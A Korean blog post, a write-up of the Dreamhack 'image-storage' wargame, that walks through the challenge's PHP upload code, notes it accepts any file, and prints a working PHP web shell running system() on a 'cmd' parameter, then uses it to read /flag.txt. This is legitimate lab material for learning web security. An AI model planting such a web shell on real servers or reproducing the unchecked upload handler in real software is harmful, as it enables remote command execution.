Dreamhack wargame : image-storage write up

Notice

Recent Posts

Recent Comments

Link

또 다른 블로그

250x250

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28

Tags more

Archives

Today

Total

관리 메뉴

'll Hacker

Dreamhack wargame : image-storage write up 본문

Hacking/WebHacking

Dreamhack wargame : image-storage write up

씨이오가 되자 2024. 2. 6. 12:31

Contents

728x90

실습을 통해 개념 익히기(로드맵 강의자료 정리)

https://dreamhack.io/wargame/challenges/38/

image-storage

php로 작성된 파일 저장 서비스입니다. 파일 업로드 취약점을 이용해 플래그를 획득하세요. 플래그는 /flag.txt에 있습니다. Reference Server-side Basic

dreamhack.io

1) 코드 분석

1-1. index.php

<li><a href="/">Home</a></li>
<li><a href="/list.php">List</a></li>
<li><a href="/upload.php">Upload</a></li>

▶️ list.php와 upload.php로 이동하는 메뉴 출력

1-2. list.php

<?php
    $directory = './uploads/';
    $scanned_directory = array_diff(scandir($directory), array('..', '.', 'index.html'));
    foreach ($scanned_directory as $key => $value) {
        echo "<li><a href='{$directory}{$value}'>".$value."</a></li><br/>";
    }
?>

▶️ $directory의 파일들 중 '. ', ' .. ' , index.html을 제외하고 나열

1-3. upload.php

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>

▶️ 이용자가 업로드한 파일을 uploads 폴더에 복사하며, 이용자는 http://host1.dreamhack.games:[PORT]/uploads/[FILENAME] URL을 을 통해 접근가능

▶️ 만약 같은 이름의 파일이 있다면 "already exists"라는 메시지를 반환

2) 취약점 분석

uploads.php에서 업로드할 파일에 대해 어떠한 검사도 하지 않음 -> 웹 셸 업로드 공격 가능

3) 익스플로잇 (공격)

//(출처: https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985 ) 
<html><body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form><pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?></pre></body></html>

▶️ php 웹 셸 코드

웹셸 작동은 윈도우 안티바이러스때문에 억까당해서 실행이 안됨 ㅇㅅㅇa;;

칼리 리눅스에서 실행시켜봄

웹 셸을 업로드하면 오른쪽 이미지처럼 목록이 나오게 된다

거기에 들어가면

실행할 수 있게끔 나옴

플래그는 /flag.txt에 있다고 하니까

cat /flag.txt하면

플래그 나옴!!!

✌️✌️✌️✌️✌️✌️✌️✌️✌️✌️

728x90

저작자표시 비영리 변경금지

'Hacking > WebHacking' 카테고리의 다른 글

Dreamhack wargame : web-ssrf write up (0)	2024.02.06
Server-side Request Forgery(SSRF) 정리 (1)	2024.02.06
Command Injection 정리 (0)	2024.02.01
NoSQL Injection 정리 및 dreamhack wargame : mango write up (0)	2024.02.01
웹해킹 유용도구 : 개발자 도구 사용법 (0)	2024.01.19

'Hacking/WebHacking' Related Articles

'll Hacker

Dreamhack wargame : image-storage write up 본문

Dreamhack wargame : image-storage write up

1) 코드 분석

2) 취약점 분석

3) 익스플로잇 (공격)

'Hacking > WebHacking' 카테고리의 다른 글

티스토리툴바